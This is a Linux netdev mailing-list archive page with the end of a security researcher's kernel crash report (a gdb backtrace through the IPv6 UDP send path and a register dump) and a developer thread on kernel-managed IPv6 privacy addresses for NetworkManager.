#14 ip6_finish_output2 (skb=skb@entry=0xffff880036abd500) at net/ipv6/ip6_output.c:113
#15 0xffffffff81495198 in ip6_finish_output (skb=skb@entry=0xffff880036abd500) at net/ipv6/ip6_output.c:131
#16 0xffffffff81495203 in NF_HOOK_COND (cond=<optimized out>, okfn=0xffffffff81495100 <ip6_finish_output>,
out=<optimized out>, in=0x0 <irq_stack_union>, skb=0xffff880036abd500, hook=4, pf=10 '\n')
at include/linux/netfilter.h:184
#17 ip6_output (skb=0xffff880036abd500) at net/ipv6/ip6_output.c:145
#18 0xffffffff814c30c5 in dst_output (skb=0xffff880036abd500) at include/net/dst.h:450
#19 ip6_local_out (skb=skb@entry=0xffff880036abd500) at net/ipv6/output_core.c:121
#20 0xffffffff814939d4 in ip6_push_pending_frames (sk=sk@entry=0xffff88003b294440) at net/ipv6/ip6_output.c:1530
#21 0xffffffff814ac7a8 in udp_v6_push_pending_frames (sk=sk@entry=0xffff88003b294440) at net/ipv6/udp.c:1003
#22 0xffffffff814adb16 in udpv6_sendmsg (iocb=<optimized out>, sk=0xffff88003b294440, msg=<optimized out>, len=5004)
at net/ipv6/udp.c:1257
#23 0xffffffff814713c0 in inet_sendmsg (iocb=0xffff880036bb9d68, sock=<optimized out>, msg=0xffff880036bb9e90, size=5004)
at net/ipv4/af_inet.c:770
#24 0xffffffff813d59a0 in __sock_sendmsg_nosec (size=5004, msg=0xffff880036bb9e90, sock=0xffff880037775900,
iocb=0xffff880036bb9d68) at net/socket.c:631
#25 __sock_sendmsg (size=5004, msg=0xffff880036bb9e90, sock=0xffff880037775900, iocb=0xffff880036bb9d68) at net/socket.c:639
#26 sock_sendmsg (sock=sock@entry=0xffff880037775900, msg=msg@entry=0xffff880036bb9e90, size=size@entry=5004)
at net/socket.c:650
#27 0xffffffff813d7fd1 in SYSC_sendto (addr_len=0, addr=0x0 <irq_stack_union>, flags=<optimized out>, len=5004,
buff=0x6387a4, fd=<optimized out>) at net/socket.c:1796
#28 SyS_sendto (fd=<optimized out>, buff=6522788, len=<optimized out>, flags=0, addr=0, addr_len=0) at net/socket.c:1761
#29 <signal handler called>
# (gdb) display/i $pc
2: x/i $pc
=> 0xffffffff8129a6bd <memcpy+13>: rep movs QWORD PTR es:[rdi],QWORD PTR ds:[rsi]
(gdb) info registers
rax 0xffff88003b251dfa -131940403044870
rbx 0xffffffffffff003e -65474
rcx 0x7 7
rdx 0x6 6
rsi 0x6 6
rdi 0xffff88003b251dfa -131940403044870
rbp 0xffff88003be498e0 0xffff88003be498e0
rsp 0xffff88003be49838 0xffff88003be49838
r8 0xc0 192
r9 0x300 768
r10 0xffff88003e001600 -131940355140096
r11 0xffff88003e001600 -131940355140096
r12 0x8 8
r13 0xffff88003ae5b700 -131940407200000
r14 0x0 0
r15 0xffff88003b7f6600 -131940397128192
rip 0xffffffff8129a6bd 0xffffffff8129a6bd <memcpy+13>
eflags 0x10206 [ PF IF RF ]
cs 0x10 16
ss 0x18 24
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
I have not tested this over other possible configurations (e.g. different qdiscs). Code paths other than the one shown in the backtrace might also be affected.
If there is any other information I can help you with, please let me know.
--
Saran Neti,
Security Researcher, TELUS Security Labs
^ permalink raw reply
* Re: [patch net-next] ipv6: allow userspace to create address with IFLA_F_TEMPORARY flag
From: Hannes Frederic Sowa @ 2013-10-29 14:38 UTC (permalink / raw)
To: Dan Williams
Cc: David Miller, jiri, vyasevich, netdev, kuznet, jmorris, yoshfuji,
kaber, thaller, stephen
In-Reply-To: <1383057078.2236.12.camel@dcbw.foobar.com>
Hi!
On Tue, Oct 29, 2013 at 09:31:18AM -0500, Dan Williams wrote:
> On Tue, 2013-10-29 at 00:48 +0100, Hannes Frederic Sowa wrote:
> > On Mon, Oct 28, 2013 at 06:16:19PM -0500, Dan Williams wrote:
> > > On Mon, 2013-10-28 at 17:17 -0400, David Miller wrote:
> > > > From: Hannes Frederic Sowa <hannes@stressinduktion.org>
> > > > Date: Sun, 27 Oct 2013 17:48:35 +0100
> > > >
> > > > > A temporary address is also bound to a non-privacy public address so
> > > > > it's lifetime is determined by its lifetime (e.g. if you switch the
> > > > > network and don't receive on-link information for that prefix any
> > > > > more). NetworkManager would have to take care about that, too. It is
> > > > > just a question of what NetworkManager wants to handle itself or lets
> > > > > the kernel handle for it.
> > > >
> > > > How much really needs to be in userspace to implement RFC4941?
> > > >
> > > > I don't like the idea that even for a fully up and properly
> > > > functioning link, if NetworkManager wedges then critical things like
> > > > temporary address (re-)generation, will cease.
> > >
> > > Honestly, I'd be completely happy to leave temporary address handling up
> > > to the kernel and *not* do it in userspace; the kernel already has all
> > > the code. There are two problems with that though, (a) it's tied to
> > > in-kernel RA handling, and (b) it's controlled by a CONFIG option. Both
> > > these are solvable.
> >
> > Ah, (a) does complicate things, I agree. But the tieing is essential
> > currently. So it seems a netlink interface would be needed to tie a new
> > address to an already installed one, if the kernel should still deal
> > with the regeneration?
>
> I think it's simpler than that. New flag set when adding the
> non-private address that says "create and manage privacy addresses for
> this non-private address". The kernel then adds the privacy addresses
> generated off the non-private address/prefixlen, and ties their lifetime
> to the non-private address. If the non-private address is removed, the
> privacy addresses could get removed too.
>
> I don't think we need API to tie addresses to already installed ones,
> because the kernel already has the privacy address generation code, so
> why should userspace generate the privacy address at all? Just leave
> that to the kernel.
Ok.
> > > First off, what's the reasoning behind having IPv6 privacy as a config
> > > option? It's off-by-default and must be explicitly turned on, so is
> > > there any harm in removing the config? Or is it just for
> > > smallest-kernel-ever folks?
> >
> > I don't know about the policy. Does it really matter as distributions
> > normally switch it on? But I would not like to see the option removed
> > entirly, maybe the default could be changed.
> >
> > > Would a new IFA_F_MANAGE_TEMP (or better name) work here, indicating
> > > that for some new static address, that the kernel should create and
> > > manage the temporary privacy addresses associated with its prefix?
> >
> > But this would only be needed if they were managed in user-space, no?
>
> "if they" == what? privacy address or static address? What
With "they" I meant privacy addresses.
> NetworkManager is trying to do is handle RAs in userspace with libndp
> for various flexibility and behavioral reasons, but we'd really like to
> leave all the temporary address stuff up to the kernel.
Can you provide me with details why the Kernel RA implementation is not good
enough? I tried to find some bugs, I found some but they were missing details
or were not even correct or outdated.
> So NM would handle RA/RS and when it gets a prefix, it would create the
> IPv6 non-private address and add it to the interface. When adding, it
> would also set the "IFA_F_MANAGE_TEMP" flag (or whatever) and the kernel
> would then handle all the privacy address generation, lifetimes, and
> timers. Basically, break some of the privacy code away from the
> in-kernel RA handling so that privacy addresses could be triggered from
> userland too.
>
> Would that be workable?
That sounds like a solid plan for me. I would actually liked to see that NM
would use the kernel implementation but I guess there is no way back any more.
:(
Greetings,
Hannes
^ permalink raw reply
page: next (older) | prev (newer) | latest
- recent:[subjects (threaded)|topics (new)|topics (active)]
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox